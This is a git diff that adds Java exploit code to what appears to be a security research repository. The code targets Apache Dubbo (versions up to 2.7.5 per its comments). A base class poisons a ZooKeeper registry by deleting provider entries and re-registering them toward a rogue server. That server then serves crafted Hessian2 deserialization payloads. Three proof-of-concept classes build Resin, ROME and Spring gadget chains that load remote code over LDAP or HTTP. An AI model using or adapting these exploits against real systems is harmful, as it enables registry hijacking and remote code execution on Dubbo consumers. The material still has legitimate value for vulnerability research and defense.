Merge branch 'feature/dubbo-rouge'

Author: threedr3am

dubbo/src/main/java/com/threedr3am/bug/dubbo/rouge/RougeBase.java

@@ -0,0 +1,95 @@
+package com.threedr3am.bug.dubbo.rouge;
+
+import java.io.OutputStream;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.net.URLDecoder;
+import java.net.URLEncoder;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
+import org.apache.curator.framework.CuratorFramework;
+import org.apache.curator.framework.CuratorFrameworkFactory;
+import org.apache.curator.retry.RetryNTimes;
+import org.apache.zookeeper.CreateMode;
+
+/**
+ * @author threedr3am
+ */
+public class RougeBase {
+
+  public String getType() {
+    return null;
+  }
+
+  public void startRougeServer(String zookeeperUri, String rougeHost, int rougePort, byte[] bytes,
+      boolean attackRegister)
+      throws Exception {
+    CuratorFrameworkFactory.Builder builder = CuratorFrameworkFactory.builder()
+        .connectString(zookeeperUri)
+        .retryPolicy(new RetryNTimes(1, 1000))
+        .connectionTimeoutMs(3000)
+        .sessionTimeoutMs(600000);
+    CuratorFramework client = builder.build();
+    client.start();
+
+    if (attackRegister) {
+      Map<String, String> data = new HashMap<>();
+      String unique = "/";
+      initData(data, unique, client);
+      attackRegister(client, data, "dubbo://" + rougeHost + ":" + rougePort + "/");
+    }
+    ServerSocket serverSocket = new ServerSocket(rougePort);
+    while (true) {
+      Socket socket = serverSocket.accept();
+      OutputStream outputStream = socket.getOutputStream();
+      outputStream.write(bytes);
+      outputStream.flush();
+      outputStream.close();
+    }
+  }
+
+  private void attackRegister(CuratorFramework client,
+      Map<String, String> data, String rougeUri) {
+    data.entrySet().forEach(d -> {
+      String pathParent = d.getKey();
+      String path = d.getValue();
+      try {
+        client.delete().forPath(pathParent + "/" + path);
+      } catch (Exception e) {
+        e.printStackTrace();
+      }
+      String pathForDecode = URLDecoder.decode(path);
+      pathForDecode = pathForDecode.replaceAll("dubbo://.+?/", rougeUri);
+      pathForDecode = pathForDecode.replaceAll("serialization=.+?&", "");
+      pathForDecode = pathForDecode + (pathForDecode.endsWith("&") ? "" : "&") + "serialization=" + getType();
+      String rougePathForEncode = URLEncoder
+          .encode(pathForDecode);
+      try {
+        client.create().withMode(CreateMode.EPHEMERAL).forPath(pathParent + "/" +rougePathForEncode);
+      } catch (Exception e) {
+        e.printStackTrace();
+      }
+    });
+  }
+
+  private void initData(Map<String, String> data, String unique,
+      CuratorFramework client) throws Exception {
+    List<String> all = client.getChildren().forPath(unique);
+    for (String i : all) {
+      String uniqueChildren = unique + (unique.length() != 1 ? "/" : "") + i;
+      if (i.equals("providers")) {
+        makeData(data, uniqueChildren, client);
+        continue;
+      }
+      initData(data, uniqueChildren, client);
+    }
+  }
+
+  private void makeData(Map<String, String> data, String provider, CuratorFramework client) throws Exception {
+    List<String> all = client.getChildren().forPath(provider);
+    if (all.size() > 0) {
+      data.put(provider, all.get(0));
+    }
+  }
+}

dubbo/src/main/java/com/threedr3am/bug/dubbo/rouge/hessian2/ResinPoc.java

@@ -0,0 +1,101 @@
+package com.threedr3am.bug.dubbo.rouge.hessian2;
+
+import com.caucho.hessian.io.Hessian2Output;
+import com.caucho.naming.QName;
+import com.threedr3am.bug.dubbo.rouge.RougeBase;
+import com.threedr3am.bug.common.server.HTTPServer;
+import com.threedr3am.bug.dubbo.support.NoWriteReplaceSerializerFactory;
+import com.threedr3am.bug.common.utils.Reflections;
+import com.threedr3am.bug.dubbo.utils.ToStringUtil;
+import java.io.ByteArrayOutputStream;
+import java.lang.reflect.Constructor;
+import java.util.Hashtable;
+import java.util.Random;
+import javax.naming.CannotProceedException;
+import javax.naming.Reference;
+import javax.naming.directory.DirContext;
+import org.apache.dubbo.common.io.Bytes;
+import org.apache.dubbo.common.serialize.Cleanable;
+
+/**
+ * dubbo 默认配置，即hessian2反序列化，都可RCE（dubbo版本<=2.7.5）
+ *
+ * <dependency>
+ *    <groupId>com.caucho</groupId>
+ *    <artifactId>quercus</artifactId>
+ *    <version>4.0.45</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class ResinPoc extends RougeBase {
+
+  static {
+    HTTPServer.run(null);
+  }
+
+  public static void main(String[] args) throws InterruptedException {
+    try {
+      Class<?> ccCl = Class.forName("javax.naming.spi.ContinuationDirContext"); //$NON-NLS-1$
+      Constructor<?> ccCons = ccCl
+          .getDeclaredConstructor(CannotProceedException.class, Hashtable.class);
+      ccCons.setAccessible(true);
+      CannotProceedException cpe = new CannotProceedException();
+      Reflections.setFieldValue(cpe, "cause", null);
+      Reflections.setFieldValue(cpe, "stackTrace", null);
+
+      cpe.setResolvedObj(new Reference("Foo", "Calc", "http://127.0.0.1:8080/"));
+
+      Reflections.setFieldValue(cpe, "suppressedExceptions", null);
+      DirContext ctx = (DirContext) ccCons.newInstance(cpe, new Hashtable<>());
+      QName qName = new QName(ctx, "foo", "bar");
+
+      Object o = ToStringUtil.makeToStringTrigger(qName);
+
+      ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+
+      // header.
+      byte[] header = new byte[16];
+      // set magic number.
+      Bytes.short2bytes((short) 0xdabb, header);
+      // set response event and serialization flag.
+      header[2] = (byte) ((byte) 0x20 | 2);
+      header[3] = 20;
+
+      // set response id.
+      Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
+
+      ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
+      Hessian2Output out = new Hessian2Output(hessian2ByteArrayOutputStream);
+      NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
+      sf.setAllowNonSerializable(true);
+      out.setSerializerFactory(sf);
+
+      out.writeObject(o);
+      out.flushBuffer();
+      if (out instanceof Cleanable) {
+        ((Cleanable) out).cleanup();
+      }
+
+      Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12);
+      byteArrayOutputStream.write(header);
+      byteArrayOutputStream.write(hessian2ByteArrayOutputStream.toByteArray());
+
+      byte[] bytes = byteArrayOutputStream.toByteArray();
+
+      String zookeeperUri = "127.0.0.1:2181";
+      String rougeHost = "127.0.0.1";
+      int rougePort = 33334;
+
+      new ResinPoc().startRougeServer(zookeeperUri, rougeHost, rougePort, bytes, true);
+
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+  }
+
+  @Override
+  public String getType() {
+    return "hessian2";
+  }
+}

dubbo/src/main/java/com/threedr3am/bug/dubbo/rouge/hessian2/RomePoc.java

@@ -0,0 +1,107 @@
+package com.threedr3am.bug.dubbo.rouge.hessian2;
+
+import com.rometools.rome.feed.impl.EqualsBean;
+import com.rometools.rome.feed.impl.ToStringBean;
+import com.sun.rowset.JdbcRowSetImpl;
+import com.threedr3am.bug.common.server.LdapServer;
+import com.threedr3am.bug.common.utils.Reflections;
+import com.threedr3am.bug.dubbo.rouge.RougeBase;
+import java.io.ByteArrayOutputStream;
+import java.lang.reflect.Array;
+import java.lang.reflect.Constructor;
+import java.util.HashMap;
+import java.util.Random;
+import org.apache.dubbo.common.io.Bytes;
+import org.apache.dubbo.common.serialize.Cleanable;
+import org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectOutput;
+
+/**
+ * dubbo 默认配置，即hessian2反序列化，都可RCE（dubbo版本<=2.7.5）
+ *
+ * <dependency>
+ * <groupId>com.rometools</groupId>
+ * <artifactId>rome</artifactId>
+ * <version>1.7.0</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class RomePoc extends RougeBase {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws Exception {
+    JdbcRowSetImpl rs = new JdbcRowSetImpl();
+    //todo 此处填写ldap url
+    rs.setDataSourceName("ldap://127.0.0.1:43658/Calc");
+    rs.setMatchColumn("foo");
+    Reflections.getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null);
+
+    ToStringBean item = new ToStringBean(JdbcRowSetImpl.class, rs);
+    EqualsBean root = new EqualsBean(ToStringBean.class, item);
+
+    HashMap s = new HashMap<>();
+    Reflections.setFieldValue(s, "size", 2);
+    Class<?> nodeC;
+    try {
+      nodeC = Class.forName("java.util.HashMap$Node");
+    } catch (ClassNotFoundException e) {
+      nodeC = Class.forName("java.util.HashMap$Entry");
+    }
+    Constructor<?> nodeCons = nodeC
+        .getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
+    nodeCons.setAccessible(true);
+
+    Object tbl = Array.newInstance(nodeC, 2);
+    Array.set(tbl, 0, nodeCons.newInstance(0, root, root, null));
+    Array.set(tbl, 1, nodeCons.newInstance(0, root, root, null));
+    Reflections.setFieldValue(s, "table", tbl);
+
+    ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+
+    // header.
+    byte[] header = new byte[16];
+    // set magic number.
+    Bytes.short2bytes((short) 0xdabb, header);
+    // set response event and serialization flag.
+    header[2] = (byte) ((byte) 0x20 | 2);
+    header[3] = 20;
+
+    // set response id.
+    Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
+
+    ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
+    Hessian2ObjectOutput out = new Hessian2ObjectOutput(hessian2ByteArrayOutputStream);
+
+    out.writeObject(s);
+
+    out.flushBuffer();
+    if (out instanceof Cleanable) {
+      ((Cleanable) out).cleanup();
+    }
+
+    Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12);
+    byteArrayOutputStream.write(header);
+    byteArrayOutputStream.write(hessian2ByteArrayOutputStream.toByteArray());
+
+    byte[] bytes = byteArrayOutputStream.toByteArray();
+
+    String zookeeperUri = "127.0.0.1:2181";
+    String rougeHost = "127.0.0.1";
+    int rougePort = 33335;
+
+    new RomePoc().startRougeServer(zookeeperUri, rougeHost, rougePort, bytes, true);
+  }
+
+  @Override
+  public String getType() {
+    return "hessian2";
+  }
+
+}

dubbo/src/main/java/com/threedr3am/bug/dubbo/rouge/hessian2/SpringAbstractBeanFactoryPointcutAdvisorPoc.java

@@ -0,0 +1,86 @@
+package com.threedr3am.bug.dubbo.rouge.hessian2;
+
+import com.caucho.hessian.io.Hessian2Output;
+import com.threedr3am.bug.dubbo.rouge.RougeBase;
+import com.threedr3am.bug.common.server.LdapServer;
+import com.threedr3am.bug.dubbo.support.NoWriteReplaceSerializerFactory;
+import com.threedr3am.bug.dubbo.utils.SpringUtil;
+import java.io.ByteArrayOutputStream;
+import java.util.Random;
+import org.apache.dubbo.common.io.Bytes;
+import org.apache.dubbo.common.serialize.Cleanable;
+import org.springframework.beans.factory.BeanFactory;
+
+/**
+ * dubbo 默认配置，即hessian2反序列化，都可RCE
+ *
+ * Spring环境可打，暂时测试Spring-boot打不了（应该是AOP相关类的问题）
+ *
+ * <dependency>
+ *   <groupId>org.springframework</groupId>
+ *   <artifactId>spring-aop</artifactId>
+ *   <version>${spring.version}</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class SpringAbstractBeanFactoryPointcutAdvisorPoc extends RougeBase {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws Exception {
+    BeanFactory bf = SpringUtil.makeJNDITrigger("ldap://127.0.0.1:43658/Calc");
+    Object o = SpringUtil.makeBeanFactoryTriggerBFPA("ldap://127.0.0.1:43658/Calc", bf);
+
+    ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+
+    // header.
+    byte[] header = new byte[16];
+    // set magic number.
+    Bytes.short2bytes((short) 0xdabb, header);
+    // set response event and serialization flag.
+    header[2] = (byte) ((byte) 0x20 | 2);
+    header[3] = 20;
+
+    // set response id.
+    Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
+
+    ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
+    Hessian2Output out = new Hessian2Output(hessian2ByteArrayOutputStream);
+    NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
+    sf.setAllowNonSerializable(true);
+    out.setSerializerFactory(sf);
+
+
+    out.writeObject(o);
+    out.flushBuffer();
+    if (out instanceof Cleanable) {
+      ((Cleanable) out).cleanup();
+    }
+
+    Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12);
+    byteArrayOutputStream.write(header);
+    byteArrayOutputStream.write(hessian2ByteArrayOutputStream.toByteArray());
+
+    byte[] bytes = byteArrayOutputStream.toByteArray();
+
+    String zookeeperUri = "127.0.0.1:2181";
+    String rougeHost = "127.0.0.1";
+    int rougePort = 33334;
+
+    new SpringAbstractBeanFactoryPointcutAdvisorPoc().startRougeServer(zookeeperUri, rougeHost, rougePort, bytes,
+        true);
+  }
+
+  @Override
+  public String getType() {
+    return "hessian2";
+  }
+
+}